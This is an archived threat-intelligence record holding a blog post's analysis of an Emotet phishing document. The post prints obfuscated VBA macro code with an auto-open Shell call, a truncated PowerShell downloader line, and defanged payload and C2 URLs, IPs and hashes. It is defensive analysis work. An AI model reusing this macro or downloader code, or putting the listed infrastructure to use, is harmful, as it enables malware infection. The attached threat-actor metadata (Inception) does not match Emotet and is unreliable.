{
	"id": "8d9fa39c-b7b8-47c3-b1b3-d8765824eaa0",
	"created_at": "2026-04-06T01:29:14.066232Z",
	"updated_at": "2026-04-10T13:11:26.646513Z",
	"deleted_at": null,
	"sha1_hash": "9a95051404fb6a7b619c6b2201572ec840f134d4",
	"title": "Comprehensive Analysis of EMOTET Malware: Part 1 by Zyad Elzyat",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 4175287,
	"plain_text": "Comprehensive Analysis of EMOTET Malware: Part 1 by Zyad\r\nElzyat\r\nBy Zyad Waleed Elzyat\r\nPublished: 2024-03-26 · Archived: 2026-04-06 01:16:35 UTC\r\n8 min read\r\nMar 26, 2024\r\nExclusive Summary\r\nEmotet, a notorious name in the realm of cyber threats, has loomed large over the digital landscape since its\r\ninception in 2014. Originally identified as a banking Trojan focused on financial data theft, Emotet has evolved\r\ninto a highly adaptable and multifaceted malware, capable of causing widespread disruption to both individuals\r\nand organizations alike.\r\nIn this comprehensive analysis, we embark on a journey into the intricate workings of Emotet, meticulously\r\ndissecting its tactics, functionalities, and the imminent dangers it presents.\r\nGet Zyad Waleed Elzyat’s stories in your inbox\r\nJoin Medium for free to get updates from this writer.\r\nRemember me for faster sign in\r\nThis initial segment of our analysis serves as a roadmap, outlining the key areas of exploration:\r\n1. Email Phishing Analysis: Delving into Emotet’s deceptive strategies deployed through phishing campaigns,\r\nwe scrutinize the emails crafted to entice unwitting victims, laying bare the intricacies of its social\r\nengineering tactics.\r\n2. Document Static and Dynamic Analysis: Employing a dual-pronged approach, we conduct static and\r\ndynamic analyses of the malicious documents disseminated by Emotet. Through static analysis, we\r\nuncover insights into its structural components, while dynamic analysis reveals its behavior within\r\ncontrolled environments, offering invaluable insights into its modus operandi.\r\n3. Malware Basic Static Analysis: Shifting our focus to the heart of Emotet, we meticulously dissect its code\r\nthrough static analysis techniques. This meticulous examination unveils its inner workings, shedding light\r\non its functionalities and potential vulnerabilities.\r\n4. Malware Dynamic Analysis: To gain a deeper understanding of Emotet’s real-world impact, we subject it to\r\ndynamic analysis. By observing its interactions with the system and network within a simulated\r\nhttps://medium.com/@zyadlzyatsoc/comprehensive-analysis-of-emotet-malware-part-1-by-zyad-elzyat-35d5cf33a3c0\r\nPage 1 of 19\n\nenvironment, we glean insights into its operational behavior and tactics.\r\nIndex:\r\n1. Email Phishing Analysis\r\n2. Document Static Analysis\r\n3. Document Dynamic Analysis\r\n4. Malware Basic Static Analysis\r\n5. Malware Dynamic Analysis\r\nMitre Attack For Emotet\r\nEmail Analysis\r\nEmotet primarily spreads through phishing emails. These emails often appear legitimate, containing familiar\r\nbranding and enticing subjects like invoices, payment details, or shipping notifications. Clicking malicious\r\nattachments or links within these emails can infect a device with Emotet.\r\nPress enter or click to view image in full size\r\nPress enter or click to view image in full size\r\nhttps://medium.com/@zyadlzyatsoc/comprehensive-analysis-of-emotet-malware-part-1-by-zyad-elzyat-35d5cf33a3c0\r\nPage 2 of 19\n\nEmail Contains:\r\nThree URLs:\r\nsara[.]buller@ottumwaschools[.]com (email address)\r\nmanagement@bavarianmotorcars[.]com (email address)\r\nhxxp[://]bengalcore[.]com/Invoice-26396-reminder/ (link)\r\nTwo invoices mentioned\r\nExplanation:\r\nInvoice Email: An invoice email is a standard communication between a business and a customer. It\r\ndetails the products or services provided, along with the amount owed.\r\nPress enter or click to view image in full size\r\nThe presence of an invoice email suggests a business transaction.\r\nhttps://medium.com/@zyadlzyatsoc/comprehensive-analysis-of-emotet-malware-part-1-by-zyad-elzyat-35d5cf33a3c0\r\nPage 3 of 19\n\nThe email addresses ( sara[.]buller@ottumwaschools[.]com and\r\nmanagement@bavarianmotorcars[.]com ) indicate communication between:\r\nOttumwa Schools (likely a school district) and someone named Sara Buller.\r\nBavarian Motorcars (presumably a car dealership) and their management team.\r\nPress enter or click to view image in full size\r\nPress enter or click to view image in full size\r\nI Ran The Third URL in anyrun sandbox , It appears that error content was removed , and URL Is\r\nMaliciuos , 4 Vendors Detect It\r\nPress enter or click to view image in full size\r\nhttps://medium.com/@zyadlzyatsoc/comprehensive-analysis-of-emotet-malware-part-1-by-zyad-elzyat-35d5cf33a3c0\r\nPage 4 of 19\n\nPress enter or click to view image in full size\r\nPress enter or click to view image in full size\r\nhttps://medium.com/@zyadlzyatsoc/comprehensive-analysis-of-emotet-malware-part-1-by-zyad-elzyat-35d5cf33a3c0\r\nPage 5 of 19\n\nPress enter or click to view image in full size\r\n“I conducted comprehensive research, including a thorough examination of MalwareURL, Virus Total and\r\nwhois , to gather intelligence on potential threats. In addition, I utilized scanning tools to analyze URLs\r\nand IP addresses, identifying Indicators of Compromise (IOCs).\r\nNS1[.]WINHOST[.]COM\r\nNS2[.]WINHOST[.]COM\r\nNS3[.]WINHOST[.]COM\r\nhareamposi[.]com\r\nhttps://medium.com/@zyadlzyatsoc/comprehensive-analysis-of-emotet-malware-part-1-by-zyad-elzyat-35d5cf33a3c0\r\nPage 6 of 19\n\nslumpdeltatime[.]com\r\nturboregale[.]com\r\nmail17[.]thesupportcenter[.]net\r\nouratlanticstore[.]com\r\nzhgrp[.]net\r\nmba269[.]net\r\nns2[.]tdigital[.]com\r\npccsh[.]org\r\nns1[.]spokaneweb[.]co\r\nkitchentoaislecatering[.]com\r\nns2[.]webmailinglists[.]com\r\nwinproteam[.]com\r\ndirteam[.]com\r\ndahtkahm[.]com\r\nbluefandago[.]com\r\ncaulfieldpreparatory[.]com\r\ndownload[.]2yourface[.]com\r\nfpbaus[.]com\r\nolaf4e[.]com\r\nsaveruralwireless[.]com\r\nloriato[.]com\r\ntravoice[.]ca\r\nconsultasas[.]com\r\nrkschmidt[.]net\r\nwebpathfinder[.]com\r\nwellbeing-center[.]com\r\nivanrivera[.]com\r\nfotonovelty[.]com\r\nroundtableusa[.]com\r\nrentwithconfidence[.]com\r\nwww[.]ultradevelopers[.]net\r\nultradevelopers[.]net\r\nworkspacellc[.]com\r\nrajib-bahar[.]com\r\nacsconnection[.]com\r\naeobinvesting[.]com\r\n164[.]155[.]169[.]37\r\n47[.]242[.]15[.]1\r\n209[.]99[.]64[.]18\r\n47[.]91[.]17[.]82\r\n47[.]52[.]230[.]230\r\n47[.]240[.]50[.]198\r\nhttps://medium.com/@zyadlzyatsoc/comprehensive-analysis-of-emotet-malware-part-1-by-zyad-elzyat-35d5cf33a3c0\r\nPage 7 of 19\n\n47[.]90[.]10[.]49\r\n47[.]56[.]93[.]201\r\n47[.]91[.]138[.]163\r\n47[.]75[.]34[.]121\r\n107[.]167[.]2[.]226\r\n64[.]79[.]170[.]62\r\n89[.]187[.]101[.]92\r\n107[.]167[.]2[.]226\r\n72[.]20[.]39[.]182\r\n216[.]52[.]229[.]6\r\n182[.]16[.]102[.]91\r\n72[.]3[.]168[.]32\r\nMSDOC Analysis\r\nmd5,02E3887DB869113CB223D9EBD9C6117F\r\nsha1,6C43C961756DBCFFCE0E26E09F97DE6775B217ED\r\nsha256,E77FF24EA71560FFCB9B6E63E9920787D858865BA09F5D63A7E44CB86A569A6E\r\nPress enter or click to view image in full size\r\nPress enter or click to view image in full size\r\nhttps://medium.com/@zyadlzyatsoc/comprehensive-analysis-of-emotet-malware-part-1-by-zyad-elzyat-35d5cf33a3c0\r\nPage 8 of 19\n\ni run the ms doc with olevba and oleid i found it malicuios and cotnain obfuscated vba code\r\nhttps://medium.com/@zyadlzyatsoc/comprehensive-analysis-of-emotet-malware-part-1-by-zyad-elzyat-35d5cf33a3c0\r\nPage 9 of 19\n\nSub FMGAn24cV()\r\n On Error Resume Next\r\n Select Case cFmIw\r\n Case 8059\r\n wUhL25 = 2636\r\n GpzXy = Jlzd789p\r\n UWiZ = 482\r\n Case 6364\r\n HfiuK0K8 = XiLc\r\n shtE = Round(RQUnj832I + ChrB(tGjztO8))\r\n huYs7195 = Int(252065587 * 127 * 204048515 + CLng(IBL))\r\n Case 46\r\n IKWt3M788 = Fix(cTuwVw8 * CByte(BLux6x4G / Tan(29285969)) * 709 * zDNle7)\r\n YwAYF = odu\r\n CZk = CStr(278725002)\r\n End Select\r\n Set xjQY96L = 3\r\nEnd Sub\r\n Sub vgYJ(kHiis167)\r\n On Error Resume Next\r\n Dim jfjyp146z()\r\n ReDim jfjyp146z(2)\r\n jfjyp146z(0) = 441\r\n jfjyp146z(1) = 14\r\n yYzpN2 = (GMOz7Gjx / CDate(XIsh) * XKEimT1 + 7391 * (9 - CStr(15 * CStr(1)) * 204179029 / Round(SI\r\nhttps://medium.com/@zyadlzyatsoc/comprehensive-analysis-of-emotet-malware-part-1-by-zyad-elzyat-35d5cf33a3c0\r\nPage 10 of 19\n\nsVS = tRTKlgHp - 147619628\r\nEnd Sub\r\nSub autoopen()\r\nukWWdsK\r\nEnd Sub\r\nSub FHjEj(LAcQVZ87)\r\n On Error Resume Next\r\n Do\r\n Dim lJeuDE96, nqrjpo6\r\n neGow086 = 4163\r\n AkQCgA = 294325181 - 51502176\r\n Loop Until bwvS69z8z \u003e= 13\r\n Do While JKyP8pxto Eqv 10\r\n For Each ZJyu In NBZq5Y\r\n oYwx = UlaI61M1 / fph * 498373131 / vrGbz * (86 * CDate(4003) * (93 + Int(Lyrs) / 28188549 -\r\n Next\r\n Set vRSb9W = 3\r\n Select Case tJBR\r\n Case 407850943\r\n jaum6Cn = ChrB(3641 * Hex(EzHUi2E))\r\n NCskA = CjuvT\r\n rSZ = CBool(Act)\r\n Case 1\r\n crvr = 368\r\n xgQY = ocXUh23\r\n QXvYq42qV = xzak9Z2\r\n Case 513122720\r\n vLZp = ChrB(233198461)\r\n eObu66H03 = 8\r\n vxQ = 385391781\r\n End Select\r\n Set ZWbLW1X89 = DzyG\r\n Loop\r\nEnd Sub\r\n Sub sSYfU0(SpsW4rP)\r\n On Error Resume Next\r\n XtaW = 252633654 - Rnd(JHd / Chr(RzwyI3)) * 582 - CSng(67 / 61 + UuzY46cs5 - CStr(404047675)) / 67\r\n YSuN0x5D = 229040495 / 36292429\r\n zFcxbS = (8 / CStr(UEi) + (ZRhr + jKDn0 - 14 / GDs * (EYA * CSng(345020765 * bQZ) - SsI / Cos(uAwx\r\nEnd Sub\r\nPublic Function ukWWdsK()\r\nOn Error Resume Next\r\nVBA.Shell$ \"\" + UWbfkwStSfN + TsvdGtsXy + CEksYkDDLPC + muCnTNfaDz + NHPPYeuBF + NhBKxbvDSCU + BHhpVS\r\nEnd Function\r\nSub JMQObR0()\r\n On Error Resume Next\r\nhttps://medium.com/@zyadlzyatsoc/comprehensive-analysis-of-emotet-malware-part-1-by-zyad-elzyat-35d5cf33a3c0\r\nPage 11 of 19\n\nLphmp5 = MDxY8q2 * uvPIG51Hm\r\n Uvcq = 314659417 * 465999738\r\nEnd Sub\r\n Sub wXFp7reR9()\r\n On Error Resume Next\r\n Do While kcJf \u003e lkPIt4\r\n For Each GIyl In OvCk\r\n PLPbA5 = Cos(188802468)\r\n Next\r\n For Each MqSKJ6f In ORvWe4F5\r\n noUx84A = 598\r\n Next\r\n For qiUPL4Ycs = cinf02 To DJpsd633\r\n FcHCQ5Ol = 531668891 * Chr(tWAv7fc2 / 401 - oOnx * Hex(22 + Log(238889098))) * yqAGY + Atn(U\r\n Next\r\n Do\r\n cgXl1L = PVFdrkie * Int(7) * ZPWvW0 / Cos(6789) - 9 + Tnbf086\r\n Loop Until xbKi8920 \u003e 6\r\n EFRQ1 = 334953148 * wLRi7\r\n Loop\r\n RSFC2F12 = mcgVq3X - 251107387\r\nEnd Sub\r\nI will enable editing in the file and run FakeNet-NG and Process Explorer to monitor connections and new\r\nprocesses triggered by enabling the macros.\r\nPress enter or click to view image in full size\r\nI’ve identified five IP addresses that malware attempts to communicate with, I Will Scan Each One.\r\nhttps://medium.com/@zyadlzyatsoc/comprehensive-analysis-of-emotet-malware-part-1-by-zyad-elzyat-35d5cf33a3c0\r\nPage 12 of 19\n\nI’ve encountered obfuscated PowerShell code within the document. To decrypt it, I’ll utilize Cyber Chef\r\nand the Power Decoder tool\r\nPress enter or click to view image in full size\r\nhttps://medium.com/@zyadlzyatsoc/comprehensive-analysis-of-emotet-malware-part-1-by-zyad-elzyat-35d5cf33a3c0\r\nPage 13 of 19\n\nPress enter or click to view image in full size\r\n$wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$random =\r\nhxxp[://]focalaudiodesign[.]com/hl/\r\nhxxp[://]furstens[.]se/sdxCegqHa/\r\nhxxp[://]firstreport[.]com/vsIFKF/\r\nhxxp[://]sarahbradley[.]com/WVfJHSF/\r\nhxxp[://]belongings[.]com/lQelF/\r\nhxxp[://]www[.]sarahbradley[.]com/WVfJHSF/\r\nhxxps[://]www[.]firstreport[.]com/vsIFKF/\r\n173[.]254[.]14[.]237\r\n66[.]147[.]242[.]93\r\n107[.]154[.]147[.]22\r\n45[.]60[.]97[.]22\r\nhttps://medium.com/@zyadlzyatsoc/comprehensive-analysis-of-emotet-malware-part-1-by-zyad-elzyat-35d5cf33a3c0\r\nPage 14 of 19\n\n89[.]221[.]250[.]20\r\n96[.]45[.]82[.]126\r\n96[.]45[.]83[.]51\r\n96[.]45[.]83[.]150\r\n96[.]45[.]82[.]249\r\n192[.]155[.]244[.]20\r\n216[.]117[.]140[.]21\r\n213[.]146[.]173[.]149\r\n213[.]146[.]173[.]150\r\n64[.]41[.]86[.]47\r\n208[.]91[.]197[.]27\r\n64[.]41[.]87[.]41\r\n64[.]41[.]94[.]112\r\n64[.]26[.]26[.]113\r\n64[.]41[.]86[.]47al\r\n208[.]91[.]197[.]27\r\n64[.]41[.]87[.]41\r\n64[.]41[.]94[.]112\r\n64[.]26[.]26[.]113\r\n207[.]204[.]50[.]27\r\nBasic Static Analysis\r\nmd5,D09A466039FFE16E231A202BD6259DB8\r\nsha1,A625728EC40BD353B79913BED4DEE0C297467D3D\r\nsha256,591D32AEAE0554F744DF8843727E794D33495FF0A4B90A9F7861AB526988DED7\r\nPress enter or click to view image in full size\r\nhttps://medium.com/@zyadlzyatsoc/comprehensive-analysis-of-emotet-malware-part-1-by-zyad-elzyat-35d5cf33a3c0\r\nPage 15 of 19\n\nThis URL’s Related With This Hash\r\nhxxp[://]24[.]45[.]195[.]162:8443/enabled/health/\r\nhxxp[://]80[.]11[.]163[.]139:443/sess/\r\nhxxp[://]24[.]45[.]195[.]162:7080/xian/attrib/sess/merge/\r\nhxxp[://]201[.]184[.]105[.]242:443/symbols/publish/\r\nhxxp[://]133[.]167[.]80[.]63:7080/tpt/between/sess/\r\nhxxp[://]94[.]192[.]225[.]46/codec/enabled/\r\nhxxp[://]198[.]199[.]114[.]69:8080/between/pdf/sess/\r\nhxxp[://]80[.]79[.]23[.]144:443/psec/attrib/\r\nPress enter or click to view image in full size\r\nfile-size,58880 bytes\r\nentropy,6.805 [Packed]\r\nfile-type,executable\r\ncpu,32-bit\r\nsubsystem,GUI\r\ncompiler-stamp,Mon Sep 30 18:18:17 2019 | UTC\r\nDIE also indicates high entropy, confirming suspicions that the file is packed\r\nPress enter or click to view image in full size\r\nhttps://medium.com/@zyadlzyatsoc/comprehensive-analysis-of-emotet-malware-part-1-by-zyad-elzyat-35d5cf33a3c0\r\nPage 16 of 19\n\nI Found Section Name .CRT ”The functions referenced in the .CRT section are usually written in C or C++\r\nand are marked with specific compiler directives or attributes to ensure they are executed at the appropriate\r\ntime during program startup or initialization.”\r\nPress enter or click to view image in full size\r\nBasic Dynamic Analysis\r\nWhen running the sample, a new program pops up, which seems like a copy of the original malware. This\r\nsuggests that the malware is making copies of itself\r\nPress enter or click to view image in full size\r\nhttps://medium.com/@zyadlzyatsoc/comprehensive-analysis-of-emotet-malware-part-1-by-zyad-elzyat-35d5cf33a3c0\r\nPage 17 of 19\n\nsha256,591D32AEAE0554F744DF8843727E794D33495FF0A4B90A9F7861AB526988DED7\r\n”C:\\Windows\\SysWOW64\\shlphans.exe”\r\n”Command Line “ — 92fb5849” “\r\nPress enter or click to view image in full size\r\nEvent, \\BaseNamedObjects\\E689B0777 ”refers to an event object in the Windows operating system. Event\r\nobjects are synchronization primitives used by programs to coordinate activities between different\r\nprocesses or threads. ”\r\nMutant, \\BaseNamedObjects\\M689B0777 “Make Sure The Malware Run Only Once On The Machine”\r\nSection, \\BaseNamedObjects\\F932B6C7–3A20–46A0-B8A0–8894AA421973\r\nAdding a random value to a registry key “HKLM\\SOFTWARE\\Microsoft\\Windows\r\nNT\\CurrentVersion\\Notifications\\Data\\418A073AA3BC3475”\r\nPress enter or click to view image in full size\r\nhttps://medium.com/@zyadlzyatsoc/comprehensive-analysis-of-emotet-malware-part-1-by-zyad-elzyat-35d5cf33a3c0\r\nPage 18 of 19\n\nPress enter or click to view image in full size\r\nConclusion\r\n“In this segment of our analysis, we progressed from phishing examination to static analysis to dynamic\r\nanalysis. In the upcoming phase, we’ll delve into code analysis, unpacking techniques, and the\r\ndevelopment of YARA rules. Stay tuned as we explore deeper into the malware’s workings and fortify our\r\n.إن شاء الله defenses\r\nreferences Eng Mahmoud Nour Eldin https://tamatah.medium.com/emotet-malware-analysis-from-email-phishing-to-code-analysis-3fae2195ebce\r\nSource: https://medium.com/@zyadlzyatsoc/comprehensive-analysis-of-emotet-malware-part-1-by-zyad-elzyat-35d5cf33a3c0\r\nhttps://medium.com/@zyadlzyatsoc/comprehensive-analysis-of-emotet-malware-part-1-by-zyad-elzyat-35d5cf33a3c0\r\nPage 19 of 19",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://medium.com/@zyadlzyatsoc/comprehensive-analysis-of-emotet-malware-part-1-by-zyad-elzyat-35d5cf33a3c0"
	],
	"report_names": [
		"comprehensive-analysis-of-emotet-malware-part-1-by-zyad-elzyat-35d5cf33a3c0"
	],
	"threat_actors": [
		{
			"id": "77b28afd-8187-4917-a453-1d5a279cb5e4",
			"created_at": "2022-10-25T15:50:23.768278Z",
			"updated_at": "2026-04-10T02:00:05.266635Z",
			"deleted_at": null,
			"main_name": "Inception",
			"aliases": [
				"Inception Framework",
				"Cloud Atlas"
			],
			"source_name": "MITRE:Inception",
			"tools": [
				"PowerShower",
				"VBShower",
				"LaZagne"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775438954,
	"ts_updated_at": 1775826686,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9a95051404fb6a7b619c6b2201572ec840f134d4.pdf",
		"text": "https://archive.orkl.eu/9a95051404fb6a7b619c6b2201572ec840f134d4.txt",
		"img": "https://archive.orkl.eu/9a95051404fb6a7b619c6b2201572ec840f134d4.jpg"
	}
}